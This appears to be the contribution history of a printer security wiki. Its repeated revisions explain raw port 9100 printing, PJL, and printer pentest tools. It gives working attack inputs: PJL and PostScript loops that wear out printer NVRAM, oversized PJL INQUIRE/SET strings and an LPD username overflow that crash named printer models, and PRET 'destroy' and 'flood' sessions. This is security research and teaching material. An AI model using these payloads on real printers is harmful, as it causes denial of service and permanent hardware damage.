Hacking Printers - User contributions [en]

Port 9100 printing

2017-02-05T19:35:21Z

134.147.128.156:

[[File:Raw-deployment-channel.png|thumb|180px|Printing over port 9100]]

Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' <ref>''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation</ref> to communicate with network printers as it is considered as ‘the simplest, fastest, and generally the most reliable network protocol used for printers’ <ref>''[https://www.cups.org/doc/network.html\#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet</ref>. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'' actually is not a printing protocol by itself. Instead all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]] interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [information disclosure] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]].

=== Who would put a printer on the Internet? ===

Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and backwards but printers usually are not directly connected to the Internet <ref>It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.</ref>. As of February 2017, the Shodan search engine [https://www.shodan.io/search?query=port:9100+pjl reveals] 48,213 printing devices '''Internet-accessible''' trough port 9100.

[[File:Shodan.png|border|Printers reachable directly via the Internet]]

Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' <ref>''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc</ref> compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength.

→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]]

----

Credential disclosure

2017-01-18T17:57:11Z

134.147.128.156:

Physical damage

2017-01-14T17:41:42Z

134.147.128.156:

Long-term settings for printers and other embedded devices are stored in non-volatile memory ([https://en.wikipedia.org/wiki/Non-volatile_random-access_memory NVRAM]) which is traditionally implemented either as [https://en.wikipedia.org/wiki/EEPROM EEPROM] or as [https://en.wikipedia.org/wiki/Flash_memory flash memory]. Both components have a limited lifetime. On early HP LaserJets `flash chips would only sustain about 1000-2000 cycles of re-writing' <ref>''[http://blog.cyrtech.de/sites/default/files/Counting%20Pages%20in%20Printer%20Data%20Streams%20%28D2%29.pdf Counting Pages in Printer Data Streams]'', J. Deußen, 2011, p. 36</ref>. Today, vendors of flash memory guarantee about 100,000 rewrites before any write errors may occur. This number sounds large, but [[PJL]] and [[PostScript]] print jobs themselves can change long-term settings like paper tray media sizes or control panel passwords. Doing this a lot of times on purpose can be a realistic attack scenario leading to physical destruction of the NVRAM. Note that printing functionality itself is not affected but fixed settings containing wrong values can make the device practically unusable.

== PJL ==

For a practical test to destroy NVRAM write functionality one can continuously set the long-term value for the number of copies with different values for <code>X</code>:

@PJL DEFAULT COPIES=X

In an evalation with 20 laser printers, eight devices indicated a corrupt NVRAM within 24 hours <ref>''[http://homepages.rub.de/jens.mueller-2/publications/2016-exploiting-network-printers.pdf Exploiting Network Printers]'', J. Müller, 2016, p. 41</ref>. Some EEPROM error codes, while others completely refused to set any long-term values anymore. The impact of such physical NVRAM destruction however is limited for two reasons: First, NVRAM parameters were not frozen at their current state (which would have been a random number of copies) but instead fixed to the factory default value. Secondly, all variables could still be changed for the current print job using the <code>@PJL SET...</code> command. Only the functionality to change long-term settings was broken.

'''How to test for this attack?'''

The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11

'''Who can perform this attack?''' The attack can only be performed by an attacker who has the capability to establish various [[Port 9100 printing|network connections]] over a longer period of time. A [[USB drive or cable|local attacker]] sneaking into a copy room usually does not have enough time to send a continuous datastream of for about 24 hours hours <ref>''Note that it might theoretically be possible to start a large print job – approximately several hundred megabytes of malicious PJL commands – from USB stick on a Friday afternoon and just walk away.''</ref>. However, she can use an axe or a hammer to cause physical damage. In a [[cross-site printing]] scenario, the victim would have to keep an attacker-controlled web site open for hours which may also be considered unrealistic <ref>''Unless you find XSS on Facebook, in which case the impact of broken printers may be negligible.''</ref>.

== PostScript ==

For PostScript, one needs to find an entry in the ''currentsystemparams'' dictionary which survives a reboot (and therefore must be stored in some kind of NVRAM). A good candidate are PostScript passwords as discussed in [[credential disclosure]]. System parameters can be incremented in a PostScript loop as show below, which can lead to a large number of NVRAM write cycles per second if the printers hardware is implemented to write values directly instead of caching them:

/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop

Such ideas are not new: The first PostScript malware in the wild, which appeared in 1990, applied the ''setpassword'' operator multiple times which quickly led to the password becoming unchangeable because of very limited EPROM write cycles on early LaserWriter printers <ref>''[http://web.archive.org/web/20010720184200/http://www.sevenlocks.com/password/pspass.txt New PostScript Virus!?]'', CompuServe Desktop Publishing Forum (via archive.org), 1990</ref><ref>''[http://www.faqs.org/faqs/computer-virus/macintosh-faq/ Viruses and the Macintosh]'', D. Harley, 2000</ref>.

'''How to test for this attack?'''

The feasibility of this attack, which has been implemented as the ''destroy'' command in [[PRET]] can be tested as follows:

./pret.py -q printer ps
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
NVRAM write cycles: 1000, 2000, 3000, ...

'''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

----

Buffer overflows

2017-01-14T17:40:02Z

134.147.128.156:

While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser.

== PJL input ==

[[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]):

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life:

@PJL SET 000000000000000000000000000000000000000000000000000000000…

'''How to test for this attack?'''

Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref> and all PJL variables dynamically retrieved from the system:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

'''Who can perform this attack?'''

Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== LPD daemon ==

The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life.

'''How to test for this attack?'''

A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"

> 02 6c 70 0a \hspace{189pt} .lp.
< 00 .
> 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001.
< 00 .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx..

'''Who can perform this attack?'''

Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]).

-------------

Buffer overflows

2017-01-14T17:33:51Z

134.147.128.156: /* How to test this attack? */

While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser.

== PJL input ==

[[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]):

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life:

@PJL SET 000000000000000000000000000000000000000000000000000000000…

=== How to test this attack? ===

Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

=== Who can perform this attack? ===

Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== LPD daemon ==

The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life.

=== How to test this attack? ===

A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"

> 02 6c 70 0a \hspace{189pt} .lp.
< 00 .
> 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001.
< 00 .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx..

=== Who can perform this attack? ===

Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]).

-------------

Buffer overflows

2017-01-14T17:33:35Z

134.147.128.156: /* How to test this attack? */

While the risk of [https://en.wikipedia.org/wiki/Buffer_overflow buffer overflows] is well-known <ref>''[http://phrack.org/issues/49/14.html Smashing The Stack For Fun And Profit]'', Aleph One, Phrack magazine #49, 1996, p. 14-16</ref> and not limited to printers, it must be noted that printers provide additional languages and network services, potentially prone to this kind of attack. Exploitation may lead to denial of service or – given correct shellcode and return address – even to remote code execution. Buffer overflows are particularly dangerous on embedded devices, as they may have no protection mechanisms like [https://en.wikipedia.org/wiki/Address_space_layout_randomization ASLR], [https://en.wikipedia.org/wiki/NX_bit NX/DEP] or user separation, so all executed code is run as superuser.

== PJL input ==

[[PJL]] processors may be vulnerable to buffer overflows if the given input exceeds the buffer size. For example, various ''Lexmark'' laser printers crash when when receiving about 1.000 characters as the ''INQUIRE'' argument (see [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0619 CVE-2010-0619]):

@PJL INQUIRE 00000000000000000000000000000000000000000000000000000…

Sending about 3.000 characters as the ''SET'' argument to the ''Dell 1720n'' crashes the device and requires a manual restart to get the printer back to life:

@PJL SET 000000000000000000000000000000000000000000000000000000000…

=== How to test this attack? ===

Buffer overflows in PJL input can be tested using PRET's ''flood'' command which sends large amounts of data to all arguments specified in the PJL reference <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997</ref>:

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> flood
Buffer size: 10000, Sending: @PJL SET [buffer]
Buffer size: 10000, Sending: @PJL [buffer]
Buffer size: 10000, Sending: @PJL COMMENT [buffer]
Buffer size: 10000, Sending: @PJL ENTER LANGUAGE=[buffer]
Buffer size: 10000, Sending: @PJL JOB NAME="[buffer]"
Buffer size: 10000, Sending: @PJL EOJ NAME="[buffer]"
Buffer size: 10000, Sending: @PJL INFO [buffer]
Buffer size: 10000, Sending: @PJL ECHO [buffer]
Buffer size: 10000, Sending: @PJL INQUIRE [buffer]
Buffer size: 10000, Sending: @PJL DINQUIRE [buffer]
Buffer size: 10000, Sending: @PJL USTATUS [buffer]
Buffer size: 10000, Sending: @PJL RDYMSG DISPLAY="[buffer]"
Buffer size: 10000, Sending: @PJL FSQUERY NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSDIRLIST NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSINIT VOLUME="[buffer]"
Buffer size: 10000, Sending: @PJL FSMKDIR NAME="[buffer]"
Buffer size: 10000, Sending: @PJL FSUPLOAD NAME="[buffer]"

=== Who can perform this attack? ===

Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]].

== LPD daemon ==

The [[LPD]] protocol seems particularly interesting when testing for buffer overflows, because it allows multiple user-defined vectors like ''jobname'', ''username'' or ''hostname'', which may not be sufficiently protected. Sending more characters than allowed by the LPD specification <ref>''[https://www.ietf.org/rfc/rfc1179.txt RFC1179: Line Printer Daemon Protocol]'', L. McLaughlin, 1990</ref> may result in an overflow. For example, receiving 150 characters and more as ''username'' operator of the control file's <code>L</code> command (''print banner page'') completely crashes the ''HP LaserJet 1200'', the ''HP LaserJet 4200N'', the ''HP LaserJet 4250N'', the ''Dell 3110cn'', the ''Kyocera FS-C5200DN'' as well as the ''Samsung MultiPress 6345N'' and requires a manual restart to get the printers back to life.

=== How to test this attack? ===

A simple LPD fuzzer to test for buffer overflows can be created using the ''lpdtest'' tool included in PRET. The <code>in</code> argument sets all user inputs defined by the LPD protocol to a certain value (in this case, Python output):

$ ./lpdtest.py printer in "`python -c 'print "x"*150'`"

> 02 6c 70 0a \hspace{189pt} .lp.
< 00 .
> 02 31 35 32 20 63 66 41 30 30 31 0a \hspace{59.5pt} .152 cfA001.
< 00 .
> 4c 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 Lxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 78 xxxxxxxxxxxxxxxx
> 78 78 78 78 78 78 78 0a 00 \hspace{108pt} xxxxxxx..

=== Who can perform this attack? ===

Anyone who can access the LPD daemon through a network. Note that a web attacker can only exploit this flaw if cross-protocol scripting to port 515/tcp is allowed by the web browser (for example, Internet Explorer 10). Most browsers however block access to the LPD port by default (see [[Cross site printing]]).

-------------

PJL

2017-01-14T17:15:44Z

134.147.128.156:

The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1-2</ref> and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]].

→ ''Related aricles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]]

------------

PRET

2017-01-10T18:27:55Z

134.147.128.156:

The Printer Exploitation Toolkit (PRET) is a Python tool developed at the University of Bochum to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]].

== External links ==

* [https://github.com/RUB-NDS/PRET Official website]

PRET

2017-01-10T18:25:48Z

134.147.128.156:

The Printer Exploitation Toolkit (PRET) is a Python tool to automate most attacks presented in this wiki. It connects to a printing device via [[Port 9100 printing|network]] or [[USB]] and allows penetration testers to exploit a large variety of bugs and features in [[PostScript]], [[PJL]] and [[PCL]], including temporary and physical [[denial of service]] attacks, resetting the device to [[factory defaults]], print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]], access to a printer's [[Memory access|memory]] and [[File system access|file system]] as well as [[Credential disclosure|password cracking]].

== External links ==

* [https://github.com/RUB-NDS/PRET Official website]

PFT

2017-01-10T18:11:55Z

134.147.128.156:

PFT, libPJL and Hijetter were the first publicly available tools for network printer exploitation. They are written in C++/VC++ and have been released by the legendary Phenoelit hacking group in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display. Furthermore, PFT allows penetration testers to set and crack PJL passwords.

== External links ==

* [http://www.phenoelit.org/hp/ Official website]

BeEF

2017-01-10T18:10:31Z

134.147.128.156:

The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

'''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.'''

== External links ==

* [http://beefproject.com/ Official website]

PFT

2017-01-10T18:08:25Z

134.147.128.156:

PFT, libPJL and Hijetter were the first publicly available tools for printer exploitation. They are written in C++/VC++ and have been released by the legendary Phenoelit hacking group in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display. Furthermore, PFT allows penetration testers to set and crack PJL passwords.

== External links ==

* [http://www.phenoelit.org/hp/ Official website]

PFT

2017-01-10T18:05:41Z

134.147.128.156:

PFT, libPJL and Hijetter were the first publicaly available C++ tools for printer exploitation, released by the Phenoelit in the early 2000s to explore printers via their [[PJL]] interface. This includes access to PJL variables, the printer's file system and the control panel display and allow penetration testers to set and crack PJL passwords.

== External links ==

* [http://www.phenoelit.org/hp/ Official website]

Praeda

2017-01-10T17:39:13Z

134.147.128.156:

Praeda is a ‘automated printer data harvesting tool’ written in Perl. It was developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. Praeda systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the tool gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests.

== External links ==

* [http://h.foofus.net/?page_id=218 Official website]

Praeda

2017-01-10T17:38:09Z

134.147.128.156:

Praeda is a ‘automated printer data harvesting tool’ developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. It systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the Perl program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests.

== External links ==

* [http://h.foofus.net/?page_id=218 Official website]

Praeda

2017-01-10T17:36:54Z

134.147.128.156:

Praeda is a ‘automated printer data harvesting tool’ developed to better understand the risks associated with multi-function printers, and to help penetration testers gather usable data during security assessment job. Praeda consists of several modules to exploit weaknesses in various printer models. It systematically collects sensitive information from the printer's embedded web server. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the tool gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests.

== External links ==

* [http://h.foofus.net/?page_id=218 Official website]

BeEF

2017-01-10T17:22:26Z

134.147.128.156:

The Browser Exploitation Framework (BeEF) is a penetration testing tool that focuses on the web browser. It allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. BeEF can hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

'''While BeEF itself is not about printers at all, it is the framework of choice to implement [[cross-site printing]] functionality.'''

== External links ==

* [http://beefproject.com/ Official website]

BeEF

2017-01-10T17:21:54Z

134.147.128.156:

USB drive or cable

2017-01-10T17:04:26Z

134.147.128.156:

Data can be send to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allows users to print directly form a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities.

Accounting bypass

2017-01-05T15:32:48Z

134.147.128.156:

Printing without permission can itself be a security risk or breach of company policy. In environments where print jobs are charged for an inside attacker has a motivation to bypass the accounting system. Typical examples range from copy shops to schools and universities where print quotas are to be enforced. Also, many companies keep track of the printer usage by each employee or by department. Besides free copies, breaking accounting and authentication systems can be used to discredit an employee for example by printing pornographic images under his name. Furthermore, being able to ‘print’ is a precondition for most attacks against network printers – therefore any restrictions need to be bypassed first.

== Introduction to print job accounting ==

There are two major approaches when it comes to print job accounting: Either let the printer handle it directly or use a print server in between. The first approach is vendor-specific, usually involves some kind of special ‘printer driver’ and is not further discussed here. The other approach involves a separate print server – usually a software implementation like [https://en.wikipedia.org/wiki/CUPS CUPS] or [https://en.wikipedia.org/wiki/LPRng LPRng] – to handle the accounting and is quite common in companies and institutions. The print server may speak LPD, IPP or further printing protocols and forwards jobs to the actual printer. '''It is important to note that direct network access to the printer must be restricted''', otherwise an attacker can easily bypass the print server and its accounting mechanisms. This not only means filtering access to the ports typically assigned to printing protocols, but also to less known printing channels like [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or the embedded web server which can often be abused to print as described in [[Network protocols]].

